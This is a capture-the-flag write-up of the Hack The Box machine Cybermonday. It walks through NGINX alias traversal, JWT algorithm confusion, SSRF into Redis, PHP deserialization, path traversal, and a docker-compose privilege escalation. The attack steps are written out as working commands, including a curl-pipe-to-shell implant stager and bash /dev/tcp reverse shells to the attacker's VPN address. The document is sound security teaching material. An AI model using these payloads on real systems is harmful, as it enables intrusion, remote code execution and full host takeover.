
HTB • Cybermonday

Cybermonday is a hard Linux-based Hack The Box machine created by Tr1s0n. We initially found a web server with a common NGINX misconfiguration that allowed us to leak the source code. On review of the PHP source, an access control issue was discovered that let us upgrade standard web accounts to admin accounts. From the admin dashboard, we found a reference to an API that was vulnerable to JSON Web Token (JWT) algorithm confusion, allowing us to craft privileged JWTs and access administrative routes. One of these routes was used to write keys on a backend Redis server via SSRF and achieve RCE through PHP session deserialization. From inside a Docker container, we contacted an internal Docker registry to download the image associated with the API, and discovered a path traversal vulnerability that enabled us to recover the password for a host OS user. Once on the host machine, a rule in the sudo policy allowed us to abuse a Python script and start a privileged Docker container. We mounted the host filesystem in this container and recovered the root flag.

Initial Recon

We began by setting up our environment and conducting a port scan using a custom nmap wrapper script. This script aids in quickly and reliably scanning for open ports on the target.

# Set up environment variables and run a port scan
echo rhost="10.10.11.228" >> ./.ctf # Add machine IP address
echo lhost="10.10.14.2" >> ./.ctf # Add our VPN IP address
. ./.ctf
ctfscan $rhost

The scan reported a total of two open ports:

State  Transport  Port  Protocol  Product  Version
Open   TCP        22    SSH       OpenSSH  8.4p1 Debian 5+deb11u1
Open   TCP        80    HTTP      nginx    1.25.1

Web

Our initial request to http://10.10.11.228 was answered with a redirect to http://cybermonday.htb. The hostname cybermonday.htb was added to /etc/hosts for easy access from a web browser. We also quickly fingerprinted the web app with Wappalyzer, and found PHP 8.1.20 in use.

# Send GET request to http://10.10.11.228
curl -i "http://$rhost"

# Add hostname "cybermonday.htb" to environment + /etc/hosts
echo "vhost=(cybermonday.htb)" >> ./.ctf && . ./.ctf
echo -e "$rhost\t${vhost[@]}" | sudo tee -a /etc/hosts

# Attempt to fingerprint cybermonday.htb:80
wappalyzer "http://cybermonday.htb" | tee ./logs/wappalyzer-cybermonday_htb.json

# Display versions
jq '.technologies[]|[.name,.version]' ./logs/wappalyzer-cybermonday_htb.json

Application Review

We visited http://cybermonday.htb in BurpSuite’s built-in Chromium browser and began to browse.

Web index cybermonday.htb web index

Both a login and registration page were found, so we registered an account at /signup, and logged in at /login to access additional profile functionality.

Login page cybermonday.htb account login page

User registration page cybermonday.htb account registration page

Off-By-Slash Path Traversal

We noticed that the site pulls static resources from the /assets directory, so we observed the difference between 404 responses when requesting nonexistent paths with and without the prefix /assets to better understand how NGINX is handling those paths.

# Request nonexistent page WITHOUT "/assets" prefix
curl -I "http://cybermonday.htb/Q2tAab/_" # 404, nginx header + PHP "X-Powered-By"

# Request nonexistent page WITH "/assets" prefix
curl -I "http://cybermonday.htb/assets/_" # 404, only nginx server header

Nonexistent paths without the /assets prefix triggered a response with the X-Powered-By: PHP/8.1.20 header, meaning they were processed by PHP. Paths with the prefix did not return that header, likely because those requests were served directly by NGINX. This pointed to an NGINX alias directive, which is frequently misconfigured. We ran some additional checks for a common misconfiguration known as NGINX off-by-slash path traversal.
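For reference, the classic vulnerable pattern looks something like the following config sketch (an assumption on our part — we never saw the actual server configuration):

```nginx
location /assets {
    # The location prefix has no trailing slash while the alias does:
    # a request for /assets../x still matches the prefix and maps to
    # /var/www/html/assets/../x, i.e. one directory above the intended folder.
    alias /var/www/html/assets/;
}
```

With a layout like this, /assets../.env would resolve to the project root's .env, matching the behavior we observed.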

# Test for NGINX off-by-slash misconfigured alias
curl -I "http://cybermonday.htb/assets.." # HTTP 301 ~> Likely vulnerable

The target appeared to be vulnerable! We began probing for files and directories commonly found at the root of a PHP project, and discovered a .git folder, which we used to recover the Git repository with git-dumper. We also downloaded .env, which was listed in .gitignore and therefore excluded from the repository.

# Check for .git folder
curl -I "http://cybermonday.htb/assets../.git" # HTTP 301 ~> folder exists

# Dump Git repository
git-dumper "http://cybermonday.htb/assets../.git" ./cybermonday.git

# Download .env from project root
curl "http://cybermonday.htb/assets../.env" -so ./cybermonday.git/.env

Before reviewing the actual code, we took a look at .env and found an encryption key presumably used to encrypt, decrypt, or validate sessions. We also learned that the app was using a Redis key-value store at redis:6379 to manage sessions in keys with the laravel_session: prefix.

APP_NAME=CyberMonday
APP_ENV=local
APP_KEY=base64:EX3zUxJkzEAY2xM4pbOfYMJus+bjx6V25Wnas+rFMzA=
APP_DEBUG=true
APP_URL=http://cybermonday.htb
...

REDIS_HOST=redis
REDIS_PASSWORD=
REDIS_PORT=6379
REDIS_PREFIX=laravel_session:
CACHE_PREFIX=
...

The source appears to use the default structure of Laravel projects defined in Laravel’s documentation. According to this standard, the core user-defined code should be stored in the app directory.

Broken Access Control

A single user property called isAdmin, referenced in app/Http/Middleware/AuthenticateAdmin.php, dictates whether a session is granted access to administrative routes. After some testing on the endpoints available to standard users, we found that the property could be altered when updating our profile with a JSON request body.

POST /home/update HTTP/1.1
Host: cybermonday.htb
Content-Length: 120
Accept: */*
Cookie: XSRF-TOKEN=...; cybermonday_session=...
Content-Type: application/json;charset=UTF-8

{
  "_token":"...",
  "username":"HTB-zVYmCf",
  "email":"zVYmCf@htb.local",
  "isAdmin": true
}

We then had access to the admin dashboard at /dashboard as well as the “Products” and “Changelog” pages referenced on the dashboard.

Admin dashboard Admin dashboard on cybermonday.htb

The changelog in particular includes some interesting information regarding changes made to the application and references a webhook used to create registration logs at http://webhooks-api-beta.cybermonday.htb/webhooks/fda96d32-e8c8-4301-8fb3-c821a316cf77.

Web changelog Administrative changelog on cybermonday.htb

Webhook API

We added the hostname webhooks-api-beta.cybermonday.htb to /etc/hosts to easily access the intended virtual host. An API schema was found at the web index detailing six distinct routes.

# Add virtual hostname to /etc/hosts
echo -e "$rhost\twebhooks-api-beta.cybermonday.htb" | sudo tee -a /etc/hosts
echo 'webhooks_api=http://webhooks-api-beta.cybermonday.htb' >> ./.ctf && . ./.ctf

# Download webhook API routes
curl -s http://webhooks-api-beta.cybermonday.htb/ | jq .message.routes > ./routes.json
{
  "/auth/register": {
    "method": "POST",
    "params": ["username", "password"]
  },
  "/auth/login": {
    "method": "POST",
    "params": ["username", "password"]
  },
  "/webhooks": {
    "method": "GET"
  },
  "/webhooks/create": {
    "method": "POST",
    "params": ["name", "description", "action"]
  },
  "/webhooks/delete:uuid": {
    "method": "DELETE"
  },
  "/webhooks/:uuid": {
    "method": "POST",
    "actions": {
      "sendRequest": {
        "params": ["url", "method"]
      },
      "createLogFile": {
        "params": ["log_name", "log_content"]
      }
    }
  }
}

The sendRequest action looked like it could easily lead to SSRF, so we tried using /webhooks/create to create a new webhook with sendRequest and found that we needed to authenticate. We proceeded to create an account at /auth/register and authenticate at /auth/login.

# Try accessing the webhook from changelog
curl -i -XPOST "$webhooks_api/webhooks/fda96d32-e8c8-4301-8fb3-c821a316cf77" # missing key

# Try to create a new webhook with sendRequest
curl -i $webhooks_api/webhooks/create \
  -H 'Content-Type: application/json' \
  -d '{"name":"KmCu","description":"d0Ik","action":"sendRequest"}' # "Unauthorized"

# Register an account + login
username='HTB-IrLGdg'
password='hIC8CZNMjr2VuQV0Al'
curl $webhooks_api/auth/register \
  -H 'Content-Type: application/json' \
  -d '{"username":"'"$username"'","password":"'"$password"'"}' # "success"
curl $webhooks_api/auth/login \
  -H 'Content-Type: application/json' \
  -d '{"username":"'"$username"'","password":"'"$password"'"}' # Got access token
{"status":"success","message":{"x-access-token":"eyJ0..."}}

A JSON Web Token (JWT) was returned in the x-access-token field, likely referring to the header it should be supplied in. With this JWT, we gained access to the /webhooks route, but did not find any new webhooks listed. We also found that /webhooks/create was still off-limits.
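To inspect what the API actually put in the token, the two JSON segments of a JWT can be base64url-decoded without verifying the signature. A minimal Python helper (our own tooling, not part of the API):

```python
import base64
import json

def jwt_decode_unverified(token: str):
    """Return (header, payload) of a JWT without checking the signature."""
    def b64url_decode(segment: str) -> bytes:
        # JWT segments drop base64 padding; restore it before decoding
        return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

    header_b64, payload_b64, _signature = token.split(".")
    return (json.loads(b64url_decode(header_b64)),
            json.loads(b64url_decode(payload_b64)))
```

Running this on the x-access-token value reveals the header fields (such as alg) and the claims the server embedded.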

# List webhooks
token="..." # Token from the successful login response
curl $webhooks_api/webhooks -H "x-access-token: $token" # No new webhooks :(

# Try to create a new webhook with sendRequest (authenticated)
curl -i $webhooks_api/webhooks/create \
  -H 'Content-Type: application/json' -H "x-access-token: $token" \
  -d '{"name":"KmCu","description":"d0Ik","action":"sendRequest"}' # still "Unauthorized"

JSON Web Tokens

We sent an authenticated request through our local BurpSuite proxy, copied it to Repeater, and began looking for security holes in the JWT implementation using BurpSuite’s JWT Editor extension.

# Send request through local BurpSuite proxy
burp_proxy="http://127.0.0.1:8080"
curl -sx $burp_proxy "$webhooks_api/webhooks" -H "x-access-token: $token"

Webhooks API request in BurpSuite Repeater Authenticated API request in BurpSuite Repeater

Webhooks API request in BurpSuite JWT Editor Authenticated API request with JWT Editor view

The JWT was signed using the RS256 algorithm (RSA) as defined in the alg field. A common vulnerability in JWT implementations that use RSA is algorithm confusion. We needed the RSA public key to test for this, so we retrieved it from the common location /jwks.json.

# Download JSON Web Keys (JWKs)
curl "$webhooks_api/jwks.json" -O

# Print key with "kid" (required by JWT Editor)
jq '.keys[0]|.kid="pwn"' ./jwks.json
{
  "kty": "RSA",
  "use": "sig",
  "alg": "RS256",
  "n": "pvezvAKCOgxwsiyV6PRJfGMul-WBYorwFIWudWKkGejMx3onUSlM8OA3PjmhFNCP_8jJ7WA2gDa8oP3N2J8zFyadnrt2Xe59FdcLXTPxbbfFC0aTGkDIOPZYJ8kR0cly0fiZiZbg4VLswYsh3Sn797IlIYr6Wqfc6ZPn1nsEhOrwO-qSD4Q24FVYeUxsn7pJ0oOWHPD-qtC5q3BR2M_SxBrxXh9vqcNBB3ZRRA0H0FDdV6Lp_8wJY7RB8eMREgSe48r3k7GlEcCLwbsyCyhngysgHsq6yJYM82BL7V8Qln42yij1BM7fCu19M1EZwR5eJ2Hg31ZsK5uShbITbRh16w",
  "e": "AQAB",
  "kid": "pwn"
}

We opened up the Keys tab under JWT Editor, selected “New RSA Key” and added the JWK object.

JWT Editor - RSA Key Import signing key from JWK

From here we navigated back to the Repeater tab, selected the JSON Web Token view, and edited the payload’s role key to “admin”. We clicked Attack ➤ HMAC Key Confusion and used the imported key and HS256 algorithm when prompted to select a signing key and algorithm.

JWT Editor - modified JWT Modified JWT in the “JWT Editor” view JWT Editor - HMAC key confusion Conduct HMAC key confusion attack

We sent the request with the forged JWT to /webhooks and it was accepted: the server validated our privileged token!

Webhooks API request with edited JWT Response indicating a valid JWT
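The same forgery can be scripted outside BurpSuite. In an algorithm confusion attack the token is signed with HS256, using the server’s own public key bytes as the HMAC secret (the byte-for-byte serialization must match whatever the server feeds its HMAC routine — a PEM export is a common candidate). A minimal sketch with a placeholder key:

```python
import base64
import hashlib
import hmac
import json

def b64url(data: bytes) -> bytes:
    return base64.urlsafe_b64encode(data).rstrip(b"=")

def forge_hs256(claims: dict, key: bytes) -> str:
    """Build an HS256 JWT signed with an arbitrary key (e.g. an RSA public key PEM)."""
    header = b64url(json.dumps({"typ": "JWT", "alg": "HS256"}).encode())
    payload = b64url(json.dumps(claims).encode())
    signing_input = header + b"." + payload
    signature = b64url(hmac.new(key, signing_input, hashlib.sha256).digest())
    return (signing_input + b"." + signature).decode()

# Placeholder secret -- in the real attack this would be the server's
# RSA public key serialized exactly the way the server serializes it
token = forge_hs256({"role": "admin"}, b"-----BEGIN PUBLIC KEY-----\n...")
```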

Finally, we could create a new webhook at /webhooks/create using the privileged token. We created a webhook that implements sendRequest, and got a new UUID to access it.

Create webhook with privileged JWT Create a new webhook to use “sendRequest”

Server Side Request Forgery (SSRF)

We began testing the new webhook for SSRF and noticed that it sends requests to any URL using the HTTP wrapper, and the method parameter accepts any string value, even with whitespace.

# Start listener
socat TCP-LISTEN:8080,fork,reuseaddr,bind=$lhost -

# (In a separate tab) trigger SSRF
uuid="e7538116-6c9b-4af4-8cd0-e7410dd4b843" # The sendRequest webhook
curl $webhooks_api/webhooks/$uuid -H 'Content-Type: application/json' \
  -d '{"url":"http://'"$lhost"':8080","method":"DEMO\r\nX:"}' -so /dev/null
DEMO
X: / HTTP/1.1
Host: 10.10.14.2:8080
Accept: */*
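The capture shows why this primitive is so useful against Redis: Redis also accepts an “inline” protocol where each line of the TCP stream is parsed as a command, so a CRLF injected into the method turns the first line of the forged request into a valid Redis command while the HTTP remnants land on separate, harmlessly-invalid lines. A sketch of the injection (the session key here is a hypothetical placeholder):

```python
# The webhook appears to build the request line as "<method> <path> HTTP/1.1";
# injecting CRLF into the method lets us smuggle a full Redis inline command.
method = "MSET laravel_session:deadbeef ''\r\nX:"  # attacker-controlled value
raw = f"{method} / HTTP/1.1\r\nHost: redis:6379\r\n\r\n".encode()

lines = raw.split(b"\r\n")
# First line reaches Redis as a complete inline command...
assert lines[0] == b"MSET laravel_session:deadbeef ''"
# ...while the HTTP leftovers become separate (invalid, but harmless) lines
assert lines[1] == b"X: / HTTP/1.1"
```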

We used this SSRF to contact the Redis store in the Laravel environment at redis:6379. To verify the blind interaction, we overwrote our Laravel session on the main site with a blank string, then confirmed that we were no longer authenticated. To recover the Laravel session ID, we decrypted the session information from the “cybermonday_session” cookie using the APP_KEY found earlier in cybermonday.git/.env.

Decoded session object Decode the “cybermonday_session” cookie with BurpSuite Inspector

# "iv" from cybermonday_session object
iv=$(echo "4ahET1XMUo4K13E5bm6NIw=="|base64 -d|xxd -p -c16)

# Key from .env
key=$(echo "EX3zUxJkzEAY2xM4pbOfYMJus+bjx6V25Wnas+rFMzA="|base64 -d|xxd -p -c32)

# "value" from decoded cybermonday_session cookie
cat << EOF | base64 -d > data.bin
Yyj5xpbX/anzgYqAsiDMwXm6HXflROxg
LyYvuA2oRtfjJJ/d+nR4Sx2/3Cziyb9m
YUsv7CdHhqUfs/l9OxmSTxd10Hp1GHNa
Re2WyYcNYkGuVgQb1FfaCxwPTupVAttL
EOF

# Decrypt the session information
session_info=$(openssl enc -d -aes-256-cbc -K $key -iv $iv -in ./data.bin)

# Session ID should be the second value
session_id=$(echo $session_info | cut -d\| -f2)

# Get redis key using REDIS_PREFIX from .env
REDIS_PREFIX="laravel_session:"
redis_key="${REDIS_PREFIX}${session_id}"
echo $redis_key

# Write to our session
curl -so /dev/null "$webhooks_api/webhooks/$uuid" -H 'Content-Type: application/json' \
  -d '{"url":"http://redis:6379","method":"MSET '"$redis_key ''"'\r\n"}'
laravel_session:LkqHznYDBJZT4DWvZOx7JWCHF6IdKdy8i1tYl8Fs

Now if we request /home again with the matching session cookie, we should be redirected to the login page since our session is no longer valid.

Verifying communication with redis server Check if session is still valid

Deserialization

Since we could control the serialized session data through SSRF to Redis, we decided to try some PHP deserialization gadget chains generated by phpggc. We initially looked for Laravel RCE chains but could not find any matching the Laravel version in use. Eventually we noticed that Monolog was configured as Laravel’s logging driver in config/logging.php, and it had plenty of compatible gadget chains.

# Laravel gadgets are mostly incompatible :/
phpggc -l "Laravel"

# Many Monolog gadgets are supported through 2.x
phpggc -l "Monolog"
Gadget Chains
-------------

NAME            VERSION                            TYPE            VECTOR        I    
Monolog/FW1     3.0.0 <= 3.1.0+                    File write      __destruct    *    
Monolog/RCE1    1.4.1 <= 1.6.0 1.17.2 <= 2.7.0+    RCE: Command    __destruct         
Monolog/RCE2    1.4.1 <= 2.7.0+                    RCE: Command    __destruct         
Monolog/RCE3    1.1.0 <= 1.10.0                    RCE: Command    __destruct         
Monolog/RCE4    ? <= 2.4.4+                        RCE: Command    __destruct    *    
Monolog/RCE5    1.25 <= 2.7.0+                     RCE: Command    __destruct         
Monolog/RCE6    1.10.0 <= 2.7.0+                   RCE: Command    __destruct         
Monolog/RCE7    1.10.0 <= 2.7.0+                   RCE: Command    __destruct    *    
Monolog/RCE8    3.0.0 <= 3.1.0+                    RCE: Command    __destruct    *    
Monolog/RCE9    3.0.0 <= 3.1.0+                    RCE: Command    __destruct    *

We started with Monolog/RCE1 because Monolog 2 appeared to be supported. We created a gadget chain triggering a call to system with the command sleep 5, causing a five-second response delay for detection purposes.

# use -a/--ascii-strings to escape unprintable bytes
serial=$(phpggc "Monolog/RCE1" "system" "sleep 5" -a)

# Create valid JSON request body
data=$(echo {} | jq --arg k "$redis_key" --arg v "$serial" \
  '.url="http://redis:6379"|.method="'"MSET \"+\$k+\" '\"+\$v+\"'\"")

# Write session to redis via SSRF
curl $webhooks_api/webhooks/$uuid -H 'Content-Type: application/json' -d "$data"
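Because the injection is blind, the only feedback channel is response time. A rough timing probe we could have scripted (looks_delayed is our own hypothetical helper, not part of any tooling above):

```python
import time
import urllib.request

def looks_delayed(url: str, cookie: str, threshold: float = 5.0) -> bool:
    """Return True if the request takes at least `threshold` seconds,
    suggesting an injected `sleep 5` ran during deserialization."""
    request = urllib.request.Request(url, headers={"Cookie": cookie})
    start = time.monotonic()
    try:
        urllib.request.urlopen(request, timeout=30)
    except OSError:
        pass  # errors still tell us how long the server held the connection
    return time.monotonic() - start >= threshold

# e.g. looks_delayed("http://cybermonday.htb/home", "cybermonday_session=...")
```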

We once again requested /home under the corresponding session and noticed a response time of just over five seconds. This was a solid indication that our command was executed, so we created another payload to download and execute a Sliver implant.

# Generate payload that will fetch a stager script
stage="https://$lhost/TdsJnG"
serial=$(phpggc "Monolog/RCE1" "system" "curl -k $stage|sh" -a)
data=$(echo {} | jq --arg k "$redis_key" --arg v "$serial" \
  '.url="http://redis:6379"|.method="'"MSET \"+\$k+\" '\"+\$v+\"'\"")

# Write to session once again
curl $webhooks_api/webhooks/$uuid -H 'Content-Type: application/json' -d "$data"

Before triggering deserialization again, we created a stage script, generated an implant, started an HTTPS listener to host both files, and initialized the mTLS command-and-control channel.

cat << EOF > stage.sh
of=\$(mktemp /tmp/Nu5I4j.XXXXXX)
curl -k https://$lhost/BuhPQk -o \$of
sh -c "chmod +x \$of;\$of &"
EOF
mtls -L 10.10.14.2 -l 8443
generate -o linux -m 10.10.14.2:8443 -l -G -s implant.elf
websites add-content -w cybermonday -c implant.elf -p /BuhPQk
websites add-content -w cybermonday -c stage.sh -p /TdsJnG
https -L 10.10.14.2 -l 443 -w cybermonday

After repeating the request to trigger deserialization, we successfully established an implant session!

Implant session established Established Sliver implant as www-data

Docker

Judging by the hostname and presence of /.dockerenv, we were confident that our implant session was in a Docker container. We found a Linux user named john in /mnt/.ssh/authorized_keys, but couldn’t find much else on the filesystem, so we began mapping the Docker network.
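The container check we applied can be condensed into a small sketch (our own heuristic, combining the /.dockerenv marker with the usual cgroup hint):

```python
import os

def probably_in_docker() -> bool:
    """Heuristic container check: Docker drops /.dockerenv at the filesystem
    root, and PID 1's cgroup paths usually mention docker or containerd."""
    if os.path.exists("/.dockerenv"):
        return True
    try:
        with open("/proc/1/cgroup") as f:
            return any("docker" in line or "containerd" in line for line in f)
    except OSError:
        return False
```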

ifconfig
socks5 start -P 1080
# Scan the 1000 most common TCP ports on 172.18.0.0/29
naabu -proxy localhost:1080 -timeout 1000 -host 172.18.0.0/29
172.18.0.7:80
172.18.0.3:3306
172.18.0.1:80
172.18.0.1:22
172.18.0.2:5000
172.18.0.4:80

Port 5000 on 172.18.0.2 looked interesting, so we forwarded it to localhost and began testing. A plain HTTP GET request verified that it was an HTTP server, but didn’t return much else. Requesting a random path revealed a Docker-Distribution-Api-Version header, identifying the service as a Docker registry.

portfwd add -r 172.18.0.2:5000 -b 127.0.0.1:5000
# Investigate 172.18.0.2:5000 through local port forward
curl -i localhost:5000 # Nothing interesting
curl -i localhost:5000/_ # "registry/2.0" ~> Docker registry

Docker Registry

The /v2/_catalog endpoint was requested to list container images. We ended up finding a custom image called cybermonday_api which was likely tied to the webhook API. The filesystem layers were downloaded from the registry and searched for relevant content.

# List images
curl -i http://localhost:5000/v2/_catalog

# Download manifest for cybermonday_api:latest
curl http://localhost:5000/v2/cybermonday_api/manifests/latest | tee latest.manifest

# Dump filesystem layers
mkdir blobs
for blob in $(jq -r ".fsLayers[].blobSum" ./latest.manifest | awk '!x[$0]++'); do
  curl "http://localhost:5000/v2/cybermonday_api/blobs/$blob" -o blobs/$blob.tgz
done

# Search through filesystem layers for relevant files
for f in $(ls blobs); do
  tar -tzf "blobs/$f" | grep -i "var/www" | sed "s/^/$f /"
done | grep "app/"

A bunch of custom PHP application sources were found at /var/www/html/app in blobs/sha256:ced3ae14*.tgz. We began to look for important secrets or exploitable bugs within the API source.

# Extract specific filesystem layer to new directory
mkdir ./cybermonday_api && cd ./cybermonday_api
tar -xzf ../blobs/sha256:ced3ae14*.tgz
cd ./var/www/html

API Code Review

We found that config.php gathers a few important variables from the environment, including database credentials that were of interest to us.

return [
    "dbhost" => getenv('DBHOST'),
    "dbname" => getenv('DBNAME'),
    "dbuser" => getenv('DBUSER'),
    "dbpass" => getenv('DBPASS')
];

We also found that app/routes/Router.php maps a previously unknown route, POST /webhooks/:uuid/logs, to the LogsController class. We took a look at app/controllers/LogsController.php since this was new content.

Local File Read

The LogsController class was affected by a bug allowing us to read local files. The “read” action first checks for ../ sequences and only then removes spaces. Because of this order of operations, we could simply place a space inside each traversal sequence (e.g. . ./) to bypass the check.

$logPath = "/logs/{$webhook_find->name}/";

switch($this->data->action) {
  // ...
  case "read":
    $logName = $this->data->log_name;

    if(preg_match("/\.\.\//", $logName)) {
      return $this->response(["status" => "error", "message" => "This log does not exist"]);
    }
    $logName = str_replace(' ', '', $logName);

    if(stripos($logName, "log") === false) {
      return $this->response(["status" => "error", "message" => "This log does not exist"]);
    }
    if(!file_exists($logPath.$logName)) {
      return $this->response(["status" => "error", "message" => "This log does not exist"]);
    }
    $logContent = file_get_contents($logPath.$logName);
    return $this->response(["status" => "success", "message" => $logContent]);
}
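The ordering mistake is easy to confirm by reproducing the checks in a few lines of Python (a model of the PHP above, not code from the target):

```python
import re

def passes_read_filter(log_name: str) -> bool:
    """Model of the PHP "read" action: reject "../" BEFORE stripping spaces."""
    if re.search(r"\.\./", log_name):
        return False
    log_name = log_name.replace(" ", "")  # spaces are removed only afterwards
    return "log" in log_name.lower()      # models the stripos($logName, "log") check

assert not passes_read_filter("../../etc/passwd")          # caught by the regex
assert passes_read_filter(". ./. ./logs/. ./etc/passwd")   # space-split traversal slips through
```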

To reach this functionality, an API key must be supplied in the X-Api-Key header, as specified in app/helpers/Api.php. To pass the stripos check, the payload must route through a directory whose name contains the string “log” (here, /logs). Finally, to pass the file_exists check, the webhook must have stored at least one log, since its log directory is only created when the first log is written. We created a shell function to simplify reading files.

public function apiKeyAuth()
{
  $this->api_key = "22892e36-1770-11ee-be56-0242ac120002";

  if(!isset($_SERVER["HTTP_X_API_KEY"]) || empty($_SERVER["HTTP_X_API_KEY"]) || $_SERVER["HTTP_X_API_KEY"] != $this->api_key)
  {
    return $this->response(["status" => "error", "message" => "Unauthorized"], 403);
  }
}
uuid="fda96d32-e8c8-4301-8fb3-c821a316cf77"
api_key="22892e36-1770-11ee-be56-0242ac120002"

# write a log to create $logPath directory
curl "$webhooks_api/webhooks/$uuid" -H "Content-Type: application/json" \
  -d '{"log_name":"x","log_content":"..."}'

# Shell function to read files 
cybermonday_api_read_file() {
  curl -s "$webhooks_api/webhooks/$uuid/logs" \
    -H "X-Api-Key: $api_key" -H "Content-Type: application/json" \
    -d '{"action":"read","log_name":". ./. ./logs/. ./'"${1}"'"}' |
      jq -r '.message'
}

# Test out the function
cybermonday_api_read_file "/etc/passwd"
# Read database connection variables from environment
cybermonday_api_read_file "/proc/self/environ" | tr \\0 \\n | sort -u
DBHOST=db
DBNAME=webhooks_api
DBPASS=ngFfX2L71Nu
DBUSER=dbuser

We successfully read the database connection information referenced in config.php from the process environment variables at /proc/self/environ. A shell was established on the host machine via SSH with the database password and the username “john”, which was found earlier in /mnt/.ssh/authorized_keys on the implant session.

# Connect via SSH
ssh john@$rhost # use DBPASS value

Privilege Escalation

Now logged in as john, we noticed a special sudo exception allowing the Python script /opt/secure_compose.py to be run as root with arguments matching *.yml.

# List sudo security policy
sudo -l
User john may run the following commands on localhost:
    (root) /opt/secure_compose.py *.yml

Docker Compose

The Python script at /opt/secure_compose.py allowed us to start Docker containers using the command-line docker-compose utility, and implemented some checks for security purposes. One of these checks, is_path_inside_whitelist, should deny volumes outside of /home/john or /mnt. Another check, check_no_symlinks, should prevent the use of symbolic links to access files outside of those permitted folders.

import sys, yaml, os, random, string, shutil, subprocess, signal

def get_user():
    return os.environ.get("SUDO_USER")

def is_path_inside_whitelist(path):
    whitelist = [f"/home/{get_user()}", "/mnt"]

    for allowed_path in whitelist:
        if os.path.abspath(path).startswith(os.path.abspath(allowed_path)):
            return True
    return False

def check_whitelist(volumes):
    for volume in volumes:
        parts = volume.split(":")
        if len(parts) == 3 and not is_path_inside_whitelist(parts[0]):
            return False
    return True

def check_read_only(volumes):
    for volume in volumes:
        if not volume.endswith(":ro"):
            return False
    return True

def check_no_symlinks(volumes):
    for volume in volumes:
        parts = volume.split(":")
        path = parts[0]
        if os.path.islink(path):
            return False
    return True

def check_no_privileged(services):
    for service, config in services.items():
        if "privileged" in config and config["privileged"] is True:
            return False
    return True

Privileged Container Bypass

The check_no_privileged check was bypassed using a special YAML value Y, which is interpreted as true by Docker’s YAML parser while PyYAML interprets it as the string “Y”. We created a YAML file that would start a privileged Docker container with the cybermonday_api image, then call a reverse shell from inside.

# Privileged Container Bypass
version: "3.0"
services:
  privileged-bypass:
    image: "cybermonday_api" # We know that this one exists from earlier
    privileged: Y # PyYAML -> "Y"; Docker -> true
    command: ["bash","-c","bash -i>&/dev/tcp/10.10.14.2/8888<&1"] # 10.10.14.2 is our VPN address
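The parser divergence this file relies on can be illustrated offline. The PyYAML pattern below is transcribed from its implicit-bool resolver and may vary across versions, so treat it as an approximation:

```python
import re

# Boolean forms from the YAML 1.1 type repository, which docker-compose's
# parser historically follows -- note the bare y/Y
YAML11_TRUE = {"y", "Y", "yes", "Yes", "YES", "true", "True", "TRUE", "on", "On", "ON"}

# Approximation of PyYAML's implicit bool resolver (resolver.py):
# a lone "Y" is absent, so yaml.safe_load("privileged: Y") keeps the string "Y"
PYYAML_BOOL = re.compile(
    r"^(?:yes|Yes|YES|no|No|NO|true|True|TRUE|false|False|FALSE|on|On|ON|off|Off|OFF)$"
)

value = "Y"
assert value in YAML11_TRUE          # docker-compose side: boolean true
assert not PYYAML_BOOL.match(value)  # secure_compose.py side: just a string
```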
# Upload our YAML exploit
scp ./privileged-bypass.yml john@$rhost:/tmp/privileged-bypass-OsE7Cu.yml

# Setup reverse shell listener
pwncat-cs -l $lhost 8888 # install PwnCat: `pip3 install pwncat-cs`

The device that stores the root filesystem was located at /dev/sda1 with the findmnt utility. We finally started the privileged container using the custom sudo policy, which triggered the reverse shell callback.

# List mounts in tree format
findmnt # ~> /dev/sda1 is the root filesystem partition

# Trigger reverse shell from privileged container
sudo /opt/secure_compose.py /tmp/privileged-bypass-OsE7Cu.yml

From the reverse shell session, we mounted the host filesystem at /mnt to gain full access. We then used chroot to switch to the mounted host filesystem, and finally read the root flag.

# Mount the host filesystem
mount /dev/sda1 /mnt

# Access the host filesystem + read the root flag
chroot /mnt bash
cat /root/root.txt

Restricted Volumes Bypass (Bonus)

The check_no_symlinks check could also be bypassed with a path that traverses a symbolic link. For example, to read a protected directory like /root, we created a symbolic link at /home/john/fs pointing to /, then reached /root by adding /home/john/fs/root as a volume.
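The root cause is that os.path.islink inspects only the final path component, so a symlinked parent directory sails through. This can be confirmed locally (using a temp directory in place of /home/john):

```python
import os
import tempfile

base = tempfile.mkdtemp()
os.symlink("/", os.path.join(base, "fs"))      # equivalent of: ln -s / /home/john/fs
volume_src = os.path.join(base, "fs", "root")  # equivalent of: /home/john/fs/root

assert not os.path.islink(volume_src)          # check_no_symlinks() would pass this path
assert os.path.realpath(volume_src) == "/root" # yet it really points at /root
```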

# Restricted Volumes Bypass
version: "3"
services:
  volumes-bypass:
    image: "cybermonday_api"
    volumes: ["/home/john/fs/root:/mnt/root:ro"]
    command: ["bash","-c","bash -i>&/dev/tcp/10.10.14.2/8888<&1"]
ln -s / /home/john/fs
sudo /opt/secure_compose.py ./volumes-bypass.yml

After catching the reverse shell, the root flag was once again read from /mnt/root/root.txt.

This post is licensed under CC BY 4.0 by the author.